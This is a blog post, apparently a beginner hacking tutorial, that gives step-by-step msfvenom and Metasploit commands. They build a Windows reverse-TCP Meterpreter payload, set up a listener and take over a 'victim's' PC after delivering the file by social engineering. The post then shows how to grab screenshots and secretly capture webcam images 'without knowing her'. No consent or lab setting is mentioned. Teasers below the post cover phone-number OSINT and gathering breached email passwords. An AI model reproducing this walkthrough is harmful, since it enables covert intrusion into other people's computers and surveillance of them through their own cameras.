Skip to main content

Hack a Windows Computer By Using a Simple Payload



Hello Friends! Today we learn “how to hack computers for beginners”.Before reading this blog, read my previous blog in which I show you How To Hack Mobile Phone Using Kali Linux.  Similarly, You can hack windows by sending a payload to the victim’s PC.


Once the user installs the payload your meterpreter session starts running and then you do anything with the victim’s PC. You can send this payload via social engineering and here lots of methods present to send that payload to the victim’s system.


DON’T MISS:- How To Hack Wifi Password Using Kali Linux? 


Let’s Start, Open your terminal and type

ifconfig

to know your private IP.

Find IP of the system

then type

msfvenom -p windows/meterpreter/reverse_tcp lhost=’Your Private IP’ lport=4444 -f exe -a x86 > hackingblogs.exe

and then hit enter and your payload for windows is ready. Your payload is present in the root folder. Now, transfer this payload to your victim’s PC.


making payload an how to hack computers for beginners

Now open your Metasploit by typing

msfconsole

msfconsole start

After opening Metasploit. Just configure some settings. By typing

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost ‘Your Private IP’

set lport 4444

exploit

starting exploiting

Now, install the payload to the victim’s system and then you see here you get meterpreter session. So, enjoy the victim’s system is hacked and now you can change and configure anything to this hack PC. But here, I will show you some commands of using it. type

sysinfo

to check the information of the system.

system is hacked and we see the sys info

type

screenshot

This will capture a screenshot of the victim’s PC.

i take screenshot here

You can also try webcam_snap & webcam_stream for taking pictures from victim’s device camera without knowing her. If you want some more commands then type

help

this will show you many different commands which you can use an exploit.

this shows help

If you want more interesting stuff like this then do subscribe to my blog. It’s free of cost and if you want to read more interesting articles like this then you can go to my table of the content page by clicking here.

Comments

Popular posts from this blog

OSINT tutorial to Find Information from a Phone Number – PhoneInfoga Tool

phone number plays a vital role in the social engineering and the open source intelligence investigation. Everyone carry’s phone, the  phone is now linked with an individual life and it has the most important information of a person. In the  OSINT investigation , we need to find-out the line type, carrier, location and other relevant information about the subject’s phone number. The number itself shows some information like country, city (landline pattern) and sometimes carrier; while the other information can be extracted by using the open platform available.   This tutorial is about PhoneInfoga, as the  official doc  says: “PHONEINFOGA IS ONE OF THE MOST ADVANCED TOOLS TO SCAN PHONE NUMBERS USING ONLY FREE RESOURCES. THE GOAL IS TO FIRST GATHER STANDARD INFORMATION SUCH AS COUNTRY, AREA, CARRIER AND LINE TYPE ON ANY INTERNATIONAL PHONE NUMBERS WITH A VERY GOOD ACCURACY. THEN SEARCH FOR FOOTPRINTS ON SEARCH ENGINES TO TRY TO FIND THE VOIP PR...

Turn Windows 8 PC Into Wi-Fi HotSpot

In Windows 8, Microsoft  quietly removed  a useful networking feature: ad-hoc networks. In Windows 7 (and previous OSes), the tool could turn your PC into a Wi-Fi hot spot, allowing it to share its Ethernet or other Internet connection with other devices by broadcasting its own network. So, if you paid for Internet access at a cafe, or you're at work, and want to share your PC's Internet with your phone or tablet, this feature would let you do that. It is very possible to do this in Windows 8, but the built-in method requires fiddling with the command prompt. And for some of us, walking into that black abyss is daunting. Instead, check out  Virtual Router Plus . It's a free, open-source program that does the geek work for you, allowing you to quickly fire up an ad-hoc network whenever you need one. Once you've downloaded the file, extract it, and launch the VirtualRouterPlus file within that folder. There's no real installation here -- the program will simply launch...

How to find the password of hacked email addresses using OSINT

https://youtu.be/JAjVwf5NEOk Open-source intelligence or OSINT   is a potent technique, and it can give a lot of valuable information, if implemented correctly with the right strategy and correct tools. In this article, I will show you how a hacker can get passwords of thousands of email addresses without attacking the webserver or without using any other hacking technique; but, just using the power of OSINT. You can implement all the techniques discussed in this article manually; however, to enhance the operation and to maximize the result, we will utilize Maltego along with a web service called Have I been Pwned? Access the Hacked Passwords Systematically Blackhat hackers usually post and publish data after hacking a webserver; for example, they dumped Linkedin hacked accounts and others. Let’s just fetch all this valuable information smartly. Tools used in this article: theHarvester Maltego Have I been Pawned I have discussed the  configuration of Maltego with Have I been P...